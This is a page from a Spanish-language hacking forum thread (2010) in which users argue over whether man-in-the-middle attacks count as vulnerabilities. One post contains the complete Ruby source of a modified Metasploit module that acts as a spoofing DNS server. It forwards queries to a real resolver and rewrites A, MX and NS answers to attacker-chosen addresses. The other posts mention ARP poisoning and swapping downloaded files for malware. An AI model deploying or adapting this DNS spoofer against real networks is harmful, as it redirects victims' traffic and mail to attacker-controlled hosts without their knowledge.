elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ayuda Nmap y Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Nmap y Metasploit  (Leído 22,846 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


Swif EME


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #30 en: 24 Febrero 2010, 21:22 pm »

que opinas Shell Root??
:silbar:



Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...

"Una vulnerabilidad es tan limitada como tu quieras que sea"

y... [Ettercap] And [Metasploit], hacen una gran pareja! :D
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #31 en: 24 Febrero 2010, 21:26 pm »

me referia a que es una tonteria...  MiTM no es una vulnerabilidad...

podrias modificar los paquetes.. pero con que objeto???
En línea




Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


Swif EME


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #32 en: 24 Febrero 2010, 22:01 pm »

me referia a que es una tonteria...  MiTM no es una vulnerabilidad...
Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...

Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD



PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.
Código
  1. ##
  2. # $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
  3. ##
  4.  
  5. ##
  6. # This file is part of the Metasploit Framework and may be subject to
  7. # redistribution and commercial restrictions. Please see the Metasploit
  8. # Framework web site for more information on licensing and terms of use.
  9. # http://metasploit.com/projects/Framework/
  10. ##
  11.  
  12.  
  13. require 'msf/core'
  14. require 'resolv'
  15.  
  16. module Msf
  17.  
  18. class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
  19.  
  20. include Auxiliary::Report
  21.  
  22. def initialize
  23. super(
  24. 'Name'        => 'MITM DNS Service',
  25. 'Version'     => '$Revision: 5540 $',
  26. 'Description'    => %q{
  27.  This hack of the metasploit fakedns.rb serves as a sort
  28.  of MITM DNS server.  Requests are passed through to a real
  29.  DNS server, and the responses are modified before being
  30.  returned to the client, if they match regular expressions
  31.  set in FILENAME.
  32. },
  33. 'Author'      => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
  34. 'License'     => MSF_LICENSE,
  35. 'Actions'     =>
  36. [
  37. [ 'Service' ]
  38. ],
  39. 'PassiveActions' =>
  40. [
  41. 'Service'
  42. ],
  43. 'DefaultAction'  => 'Service'
  44. )
  45.  
  46. register_options(
  47. [
  48. OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
  49. OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
  50. # W: Added in an option for a set of filters, took out the catchall TARGETHOST
  51. OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
  52. OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
  53. ], self.class)
  54. end
  55.  
  56.  
  57. def run
  58.  
  59. begin
  60.  fp = File.new(datastore['FILENAME'])
  61. rescue
  62.  print_status "Could not open #{datastore['FILENAME']} for reading.  Quitting."
  63.    return
  64. end
  65. mod_entries = []
  66. while !fp.eof?
  67.    entry = fp.gets().chomp().split(',')
  68.    mod_entries.push([entry[0],Regexp.new(entry[1])])
  69.  end
  70.  
  71.  
  72. @port = datastore['SRVPORT'].to_i
  73.  
  74.    # MacOS X workaround
  75.    ::Socket.do_not_reverse_lookup = true
  76.  
  77.    @sock = ::UDPSocket.new()
  78.    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
  79.    @sock.bind(datastore['SRVHOST'], @port)
  80.    @run = true
  81.  
  82. Thread.new {
  83. # Wrap in exception handler
  84.  begin
  85.  
  86.        while @run
  87.          packet, addr = @sock.recvfrom(65535)
  88.          if (packet.length == 0)
  89.              break
  90.          end
  91.  
  92.          request = Resolv::DNS::Message.decode(packet)
  93.  
  94.  
  95.          # W: Go ahead and send it to the real DNS server and
  96.          #    get the response
  97.          sock2 = ::UDPSocket.new()
  98.          sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53)
  99.          packet2, addr2 = sock2.recvfrom(65535)
  100.          sock2.close()
  101.  
  102.  
  103.          real_response = Resolv::DNS::Message.decode(packet2)
  104.          fake_response = Resolv::DNS::Message.new()
  105.  
  106.          fake_response.qr = 1 # Recursion desired
  107.          fake_response.ra = 1 # Recursion available
  108.          fake_response.id = real_response.id
  109.  
  110.          real_response.each_question { |name, typeclass|
  111.            fake_response.add_question(name, typeclass)
  112.          }
  113.  
  114.          real_response.each_answer { |name, ttl, data|
  115.            replaced = false
  116.            mod_entries.each { |e|
  117.              if name.to_s =~ e[1]
  118.                case data.to_s
  119.                when /IN::A/
  120.                  data = Resolv::DNS::Resource::IN::A.new(e[0])
  121.                  replaced = true
  122.                when /IN::MX/
  123.                  data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
  124.                  replaced = true
  125.                when /IN::NS/
  126.                  data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  127.                  replaced = true
  128.                when /IN::PTR/
  129.                  # Do nothing
  130.                  replaced = true
  131.                else
  132.                  # Do nothing
  133.                  replaced = true
  134.                end
  135.              end
  136.              break if replaced
  137.            }
  138.            fake_response.add_answer(name,ttl,data)
  139.          }
  140.  
  141.          real_response.each_authority { |name, ttl, data|
  142.            mod_entries.each { |e|
  143.              if name.to_s =~ e[1]
  144.                data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  145.                break
  146.              end
  147.            }
  148.            fake_response.add_authority(name,ttl,data)
  149.          }
  150.  
  151.          response_packet = fake_response.encode()
  152.  
  153.          @sock.send(response_packet, 0, addr[3], addr[1])
  154.        end
  155.  
  156. # Make sure the socket gets closed on exit
  157.  rescue ::Exception => e
  158.  print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
  159.  ensure
  160.  @sock.close
  161.  end
  162.  
  163. }
  164.  
  165. end
  166.  
  167. end
  168. end
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #33 en: 26 Febrero 2010, 01:11 am »

me referia a que es una tonteria...  MiTM no es una vulnerabilidad...

podrias modificar los paquetes.. pero con que objeto???


jajaja, cierto cierto.... qué tontería esto de poder modificar los archivos que te bajes eh... mira que si alguien coge y te cambia tu  crack.exe por virusaco.exe aisss que tonterías... xD

Un MiTM yo lo considero que es una vulnerabilidad, es una vulnerabilidad de ciertas configuraciones de las tablas cache ARP. Hace 1 año o asi unos investigadores consiguieron hacer un MiTM a una camara de vigilancia IP, pudiendo insertar el video que quisiesen, eso tambien lo ves una tonteria? jaja

si es capaz, de modificar los paquetes que un usuario se descarga tiene medio trabajo hecho...
En línea

Colaboraciones:
1 2
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #34 en: 26 Febrero 2010, 01:47 am »

que es eso de "ciertas configuraciones" ???

el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP

no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..

y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...

modificar paquetes???  hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)

el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
 
y respecto a MSF...  si te sirve, bien si no... tambn...
En línea




tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #35 en: 27 Febrero 2010, 12:41 pm »

que es eso de "ciertas configuraciones" ???

el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP

no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..

y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...

modificar paquetes???  hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)

el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
 
y respecto a MSF...  si te sirve, bien si no... tambn...


con ciertas configuraciones me refería exactamente a lo que tu has mencionado, se pueden configurar las tablas de manera estática evitando el ARP poisoning o de manera dinámica siendo vulnerable ( aun que no quieras aceptar ese término ).

modificar paquetes es una solucion perfectamente válida, quizá dificil de implementar, pero válida es xD
En línea

Colaboraciones:
1 2
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #36 en: 27 Febrero 2010, 14:39 pm »

y venga... que modificarias en los paquetes???

nada de que es dificil.. si lo mencionaste es porque sabes hacerlo....
En línea




Páginas: 1 2 3 [4] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nmap, Nessus y Metasploit
Dudas Generales
El Gnomo 1 3,689 Último mensaje 10 Enero 2011, 01:27 am
por Shell Root
Nmap, Nessus y Metasploit
Hacking
El Gnomo 2 4,513 Último mensaje 13 Enero 2011, 23:26 pm
por El Gnomo
Ayuda urgente con los NSE de nmap-6.00
Hacking
D4rck4r 2 1,816 Último mensaje 11 Junio 2012, 02:59 am
por D4rck4r
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
robertito_prado 3 2,183 Último mensaje 23 Julio 2012, 03:33 am
por robertito_prado
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
D4rck4r 0 1,380 Último mensaje 10 Agosto 2012, 20:38 pm
por D4rck4r
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines